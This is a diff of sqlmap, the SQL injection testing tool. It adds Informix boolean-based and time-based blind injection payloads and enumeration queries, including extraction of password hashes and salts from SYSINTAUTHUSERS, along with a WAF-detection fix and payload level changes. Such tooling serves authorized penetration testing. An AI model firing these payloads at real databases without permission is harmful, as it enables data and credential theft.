80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py 80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py
477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py 477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py
@@ -440,11 +447,11 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml 2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml 535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
2e13b9e0a51768969d4ccc02cf62ea70 xml/livetests.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml
18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml 4b266898af8b7f380db910511de24ec4 xml/payloads/boolean_blind.xml
103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml 103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
c8b152ecebf04ec997e52c6c78cbd488 xml/payloads/time_blind.xml c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
033b39025e8ee0f302935f6db3a39e77 xml/payloads/union_query.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
313c0e1cc42de27a29c0e0ac67fee71d xml/queries.xml 1587a02322a96ac48973e782d6fedf73 xml/queries.xml


@@ -471,6 +471,7 @@ settingsid
lname
sale_date
module_addr
+flag
# spanish
usuario


@@ -1615,6 +1615,7 @@ SPACE
geo_Sea
DATA_ORG
Contributor
+flag
# Various Joomla tables
jos_vm_product_download

File diff suppressed because it is too large.


@@ -18,7 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
    _, headers, _ = get_page(get=vector)
    retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None
-    retval = re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
+    retval |= re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
    retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None
    if retval:
        break
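The one-character change is the whole fix: with plain '=', the Set-Cookie check discarded the result of the mangled-header check on the line above, while '|=' ORs each signal into the running verdict. In miniature (the booleans are illustrative):

header_hit, cookie_hit, via_hit = True, False, False

retval = header_hit
retval = cookie_hit          # old code: overwrites the earlier True -> False
print(retval)

retval = header_hit
retval |= cookie_hit         # fixed code: OR-accumulates -> True
retval |= via_hit
print(retval)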

File diff suppressed because it is too large.


@@ -841,6 +841,44 @@ Tag: <test>
</details>
</test>
<test>
<title>Informix boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Microsoft Access boolean-based blind - Parameter replace</title>
<stype>1</stype>
@@ -879,44 +917,6 @@ Tag: <test>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<!-- Works in MySQL, Oracle, etc. -->
<test>
<title>Boolean-based blind - Parameter replace (DUAL)</title>
@@ -951,6 +951,40 @@ Tag: <test>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Works in SAP MaxDB, Informix, etc. -->
<test>
<title>Boolean-based blind - Parameter replace (CASE)</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
</test>
<test>
<title>Boolean-based blind - Parameter replace (CASE) (original value)</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
<test>
<title>MySQL &gt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>


@@ -5,7 +5,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
<stype>4</stype>
-<level>1</level>
+<level>2</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -26,7 +26,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries</title>
<stype>4</stype>
-<level>2</level>
+<level>3</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -46,7 +46,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
<stype>4</stype>
-<level>2</level>
+<level>3</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -67,7 +67,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
<stype>4</stype>
-<level>3</level>
+<level>4</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -87,7 +87,7 @@
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
<stype>4</stype>
-<level>2</level>
+<level>3</level>
<risk>2</risk>
<clause>0</clause>
<where>1</where>
@@ -107,7 +107,7 @@
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
<stype>4</stype>
-<level>4</level>
+<level>5</level>
<risk>2</risk>
<clause>0</clause>
<where>1</where>


@@ -570,7 +570,7 @@
</test>
<test>
-<title>Microsoft SQL Server/Sybase time-based blind</title>
+<title>Microsoft SQL Server/Sybase time-based blind (IF)</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
@@ -591,7 +591,7 @@
</test>
<test>
-<title>Microsoft SQL Server/Sybase time-based blind (comment)</title>
+<title>Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>
<stype>5</stype>
<level>4</level>
<risk>1</risk>
@@ -1337,7 +1337,85 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<test>
<title>Informix AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- End of time-based boolean tests -->
<!-- Time-based boolean tests - Numerous clauses -->
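Informix offers no usable SLEEP() here, so the delay comes from a deliberately expensive subquery (a full count over SYSMASTER:SYSPAGHDR) that the CASE only evaluates when the inference holds. With the placeholders filled in, a generated payload looks roughly like this (the random number and the inference shown are illustrative):

AND 5927=(CASE WHEN (ASCII(SUBSTR((SELECT * FROM (SELECT USER FROM SYSMASTER:SYSDUAL)),1,1))>77) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE 5927 END)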
@@ -1738,6 +1816,25 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>Informix time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- End of time-based boolean tests - Parameter replace -->
<!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
@@ -1938,6 +2035,6 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
</root>


@@ -346,7 +346,7 @@
<test>
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
-<level>1</level>
+<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -368,7 +368,7 @@
<test>
<title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
-<level>1</level>
+<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -412,7 +412,7 @@
<test>
<title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
<stype>6</stype>
-<level>1</level>
+<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -434,7 +434,7 @@
<test>
<title>MySQL UNION query (NULL) - 1 to 10 columns</title>
<stype>6</stype>
-<level>1</level>
+<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>


@@ -714,4 +714,67 @@
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/> <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
</search_column> </search_column>
</dbms> </dbms>
<!-- Informix -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_072.htm -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sec.doc/ids_am_041.htm -->
<dbms value="Informix">
<cast query="RTRIM(TO_CHAR(%s))"/>
<length query="CHAR_LENGTH(RTRIM(%s))"/>
<isnull query="NVL(%s,' ')"/>
<delimiter query="||"/>
<limit query="SELECT SKIP %d LIMIT 1"/>
<limitregexp query="\s+SKIP\s+([\d]+)\s*LIMIT\s*([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL"/>
<hex query="HEX(%s)"/>
<!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->
<inference query="ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d"/>
<banner query="SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL"/>
<current_user query="SELECT USER FROM SYSMASTER:SYSDUAL"/>
<current_db query="SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL"/>
<hostname query="SELECT DBINFO('DBHOSTNAME') FROM SYSMASTER:SYSDUAL"/>
<table_comment/>
<column_comment/>
<is_dba query="(SELECT USERTYPE FROM SYSUSERS WHERE USERNAME=USER)='D'"/>
<users>
<inband query="SELECT USERNAME FROM SYSUSERS"/>
<blind query="SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME" count="SELECT COUNT(USERNAME) FROM SYSUSERS"/>
</users>
<passwords>
<inband query="SELECT USERNAME,HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
<blind query="SELECT HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
</passwords>
<privileges>
<inband query="SELECT USERNAME,USERTYPE FROM SYSUSERS" condition="USERNAME"/>
<blind query="SELECT USERTYPE FROM SYSUSERS WHERE USERNAME='%s'"/>
</privileges>
<roles/>
<dbs>
<inband query="SELECT NAME FROM SYSMASTER:SYSDATABASES"/>
<blind query="SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME" count="SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES"/>
</dbs>
<tables>
<inband query="SELECT TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
<blind query="SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME" count="SELECT COUNT(TABNAME) FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
</tables>
<columns>
<inband query="SELECT COLNAME,COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
<blind query="SELECT SKIP %d LIMIT 1 COLNAME FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' ORDER BY COLNAME" query2="SELECT COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' AND COLNAME='%s'" count="SELECT COUNT(COLNAME) FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s:%s"/>
<blind query="SELECT SKIP %d LIMIT 1 %s FROM %s:%s ORDER BY %s" count="SELECT COUNT(*) FROM %s:%s"/>
</dump_table>
<search_db/>
<search_table/>
<search_column/>
</dbms>
</root>
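The blind templates above lean on Informix's SKIP/LIMIT pagination to pull one row per request; substituting the counters shows the shape of the generated queries (the 'testdb' name is a placeholder):

template = ("SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES "
            "WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME")

for index in range(3):
    print(template % (index, "testdb"))  # rows 0, 1 and 2 of the catalog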


@@ -1,284 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">
<xs:element name="Results">
<xs:complexType>
<xs:all>
<xs:element ref="Messages" minOccurs="0" />
<xs:element ref="Banner" minOccurs="0"/>
<xs:element ref="CurrentUser" minOccurs="0"/>
<xs:element ref="CurrentDB" minOccurs="0"/>
<xs:element ref="isDBA" minOccurs="0"/>
<xs:element ref="Users" minOccurs="0"/>
<xs:element ref="UserSettings" minOccurs="0"/>
<xs:element ref="DBs" minOccurs="0"/>
<xs:element ref="DBTables" minOccurs="0"/>
<xs:element ref="Technics" minOccurs="0" />
<xs:element ref="Lists" minOccurs="0" />
<xs:element ref="DatabaseColumns" minOccurs="0" />
<xs:element ref="DBValues" minOccurs="0"/>
<xs:element ref="Queries" minOccurs="0"/>
<xs:element ref="RegistryEntries" minOccurs="0"/>
<xs:element ref="FileContent" minOccurs="0"/>
<xs:element ref="Status"/>
</xs:all>
</xs:complexType>
</xs:element>
<!-- Simple Types -->
<xs:element name="Banner" type="xs:string"/>
<xs:element name="CurrentUser" type="xs:string"/>
<xs:element name="CurrentDB" type="xs:string"/>
<!-- File Content -->
<xs:element name="FileContent">
<xs:complexType mixed="true">
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- RegistryEntries -->
<xs:element name="RegistryEntries">
<xs:complexType>
<xs:sequence>
<xs:element ref="RegisterData" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="RegisterData" type="xs:string"/>
<!-- Queries -->
<xs:element name="Queries">
<xs:complexType>
<xs:sequence>
<xs:element ref="Query" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Query">
<xs:complexType mixed="true">
<xs:attribute name="value" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- Columns -->
<xs:element name="DatabaseColumns">
<xs:complexType>
<xs:sequence>
<xs:element ref="DB" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DB">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Table" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Table">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Column" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Column">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- List -->
<xs:element name="Member">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Member" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="List">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Member" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Lists">
<xs:complexType>
<xs:sequence>
<xs:element ref="List" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<!-- Technics -->
<xs:element name="Technics">
<xs:complexType>
<xs:sequence>
<xs:element ref="Technic" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Technic">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- Messages -->
<xs:element name="Messages">
<xs:complexType>
<xs:sequence>
<xs:element ref="Message" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Message">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- is DBA -->
<xs:element name="isDBA">
<xs:complexType>
<xs:attribute name="value" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<!-- Users -->
<xs:element name="Users">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBUser"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBUser" type="xs:string"/>
<!-- User Settings -->
<xs:element name="UserSettings">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" maxOccurs="unbounded" ref="UserSetting"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="UserSetting">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" maxOccurs="unbounded" ref="User"/>
</xs:sequence>
<xs:attribute name="type" use="required"/>
</xs:complexType>
</xs:element>
<xs:element name="User">
<xs:complexType>
<xs:sequence>
<xs:element ref="Settings" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="Settings">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required"/>
</xs:complexType>
</xs:element>
<!-- Databases -->
<xs:element name="DBs">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBName"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBName" type="xs:NCName"/>
<!-- DB Tables -->
<xs:element name="DBTables">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="Database"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Database">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBTable"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="DBTable" type="xs:NCName"/>
<!-- Table Values -->
<xs:element name="DBValues">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" ref="DBTableValues"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBTableValues">
<xs:complexType>
<xs:sequence>
<xs:element ref="Row" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="db" type="xs:string"/>
<xs:attribute name="name" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Row">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="Cell"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Cell">
<xs:complexType mixed="true">
<xs:attribute name="column" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<!-- Status Elements -->
<xs:element name="Status">
<xs:complexType>
<xs:sequence>
<xs:element ref="Error" minOccurs="0"/>
</xs:sequence>
<xs:attribute name="success" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="Error">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
</xs:schema>
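
As an aside (not part of the diff): in the schema removed above, Status, with its required success attribute, is the only mandatory child of Results; every other element is optional. A minimal, hypothetical document that would have validated against it, sketched with Python's standard library purely for illustration:

# Illustrative sketch only: a minimal document accepted by the removed schema.
# Status (with its required 'success' attribute) is the only mandatory child;
# the Banner text below is a hypothetical value.
import xml.etree.ElementTree as ET

results = ET.Element("Results")
banner = ET.SubElement(results, "Banner")
banner.text = "Informix Dynamic Server Version 12.10"
ET.SubElement(results, "Status", success="true")

print(ET.tostring(results, encoding="unicode"))
# -> <Results><Banner>Informix Dynamic Server Version 12.10</Banner><Status success="true" /></Results>
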